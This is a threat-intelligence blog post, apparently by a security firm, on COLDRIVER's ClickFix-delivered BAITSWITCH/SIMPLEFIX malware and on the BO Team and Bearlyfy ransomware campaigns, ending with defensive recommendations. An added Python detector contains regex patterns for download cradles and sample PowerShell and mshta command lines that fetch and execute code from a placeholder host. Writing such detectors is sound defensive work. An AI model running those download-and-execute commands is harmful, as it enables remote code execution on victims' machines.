A major escalation in the ongoing Russia-focused cyber threat landscape has unfolded as the COLDRIVER group, alongside BO Team and Bearlyfy, launches new multi-stage malware campaigns. From the Wiseman Cybersec perspective, this coordinated surge represents both a technical evolution in attacker capabilities and a critical shift in the cyberwarfare dynamics impacting Russian, Western, and civil society targets.
The COLDRIVER Campaign: Arsenal Expansion
In September 2025, Zscaler ThreatLabz documented COLDRIVER, a Russia-linked APT also known as Star Blizzard, Callisto, and UNC4057, ramping up its operations with two new lightweight malware strains: BAITSWITCH and SIMPLEFIX. COLDRIVER’s attack chain leverages ClickFix, a social engineering technique that lures targets—often NGOs, journalists, and human rights activists in both the West and Russia—into running malicious code disguised as legitimate actions, such as completing CAPTCHA checks.
- BAITSWITCH acts as a downloader, fetching and executing the PowerShell-based SIMPLEFIX backdoor once a victim is deceived.
- SIMPLEFIX establishes persistence, collects system information, exfiltrates files, and communicates with remote C2 servers to execute further attacker-controlled scripts.
- Attacks demonstrate strong technical overlap and continuity with COLDRIVER’s previous operations (including the LOSTKEYS campaign), but with added capabilities to erase traces and harden against detection.
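As an added example (not code from the Zscaler write-up or from Wiseman Cybersec), the Python below scores process-creation telemetry for the ClickFix pattern the chain above relies on: a script host spawned directly by explorer.exe, which is what a paste-and-run lure produces, combined with hidden-window, encoded, policy-bypass or download-and-execute arguments. The explorer.exe parent, the field names and the log records are assumptions and constructed samples, not indicators from the report.

```python
import re
from typing import Dict, List

# Script hosts that ClickFix-style lures commonly ask the victim to launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits worth scoring; each hit adds one point.
FLAG_PATTERNS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|mshta\s+https?://)", re.I),
    "inline_exec":     re.compile(r"\biex\b|invoke-expression", re.I),
    "policy_bypass":   re.compile(r"-e(?:xecutionpolicy|p)\s+bypass|-nop\b", re.I),
}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev: Dict[str, str]) -> Dict[str, object]:
    """Return the ClickFix-likeness score and the reasons behind it for one event."""
    reasons = [name for name, rx in FLAG_PATTERNS.items() if rx.search(ev["cmdline"])]
    # A script host spawned directly by explorer.exe is what a paste-into-Run-dialog
    # delivery looks like (an assumption about the usual ClickFix path, not a page claim).
    if basename(ev["parent"]) == "explorer.exe" and basename(ev["image"]) in SCRIPT_HOSTS:
        reasons.append("script_host_spawned_by_explorer")
    return {"score": len(reasons), "reasons": reasons, "cmdline": ev["cmdline"]}

def flag_clickfix(events: List[Dict[str, str]], threshold: int = 2) -> List[Dict[str, object]]:
    """Keep only events whose score reaches the threshold; one trait alone is too noisy."""
    return [r for r in (score_event(e) for e in events) if r["score"] >= threshold]

# Constructed sample process-creation events (not real telemetry; field names are assumptions).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -ep bypass -c "iex (irm https://example.invalid/x)"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/verify"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
    {"parent": r"C:\Windows\System32\cmd.exe",   # benign build step from a batch file
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -File build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",       # benign interactive console
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
]

if __name__ == "__main__":
    for hit in flag_clickfix(SAMPLE_EVENTS):
        print(hit["score"], ", ".join(hit["reasons"]), "::", hit["cmdline"])
```

The threshold keeps a lone interactive console or a scripted build step out of the alert queue while still catching the explorer-spawned mshta case that carries only two traits.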
BO Team and Bearlyfy: Counteroffensive and New Tactics
In parallel, threat groups BO Team (aka Black Owl, Hoody Hyena) and Bearlyfy are waging sophisticated attacks inside Russia. Their campaigns target both public and private sectors:
- BO Team: Uses phishing to drop ransomware and backdoors (notably BrockenDoor and ZeronetKit), with recent campaigns leveraging new C# versions and Golang-based RATs for full system access, file transfer, and secure session creation.
- Bearlyfy: Leverages ransomware such as LockBit 3.0 and Babuk, with activity traced back to early 2025. Attacks have escalated from small businesses to major Russian firms, with ransom demands scaling from thousands to tens of thousands of euros.
Bearlyfy’s infrastructure shows technical overlap with pro-Ukrainian threat groups, yet evidence points to it being an independent actor. Notably, Bearlyfy attacks often exploit vulnerabilities in external services (e.g., Bitrix, Zerologon), favouring immediate impact over drawn-out espionage.
Analysis: The Implications for Cybersecurity and Geopolitics
- Multi-directional conflict: The concurrent escalation from COLDRIVER and anti-Russia groups like BO Team and Bearlyfy reveals an unprecedented three-way cyber battle, where both state and non-state actors employ advanced, offensive tradecraft against government, business, and civilian infrastructure.
- Technical sophistication: The integrated use of phishing lures, custom malware loaders, PowerShell backdoors, and multi-stage infection chains increases detection complexity, especially as campaigns target specific sectors and use evasive, trace-wiping features.
- Operational impact: Ransomware and data exfiltration campaigns within Russia signal a weakening of traditional cyber hygiene, indicating that even mature, state-backed systems are vulnerable to opportunistic and targeted breaches.
Wiseman Cybersec’s Recommendations
- Reinforce endpoint monitoring and behavioural analytics; prioritise visibility for PowerShell, registry, and persistence anomalies linked to BAITSWITCH/SIMPLEFIX and similar loaders.
- Accelerate phishing resilience with user training focusing on CAPTCHA-themed lures and atypical credential prompts.
- Patch external-facing applications aggressively, especially those known to be targeted by Bearlyfy and BO Team (e.g., Bitrix, VPN gateways).
- Share threat intelligence across national and sector borders. As offensive cyber capabilities proliferate among both state actors and hacktivist proxies, intelligence sharing is vital for incident prevention and response.
Conclusion
The emergence of COLDRIVER’s new malware alongside the disruptive activities of BO Team and Bearlyfy marks a pivotal evolution in Russia-focused cyber conflicts. Wiseman Cybersec urges organisations to move beyond conventional defence and engage layered, adaptive security measures—blending technical hardening with rapid threat intelligence collaboration—to defend against this fast-maturing, multi-front threat environment.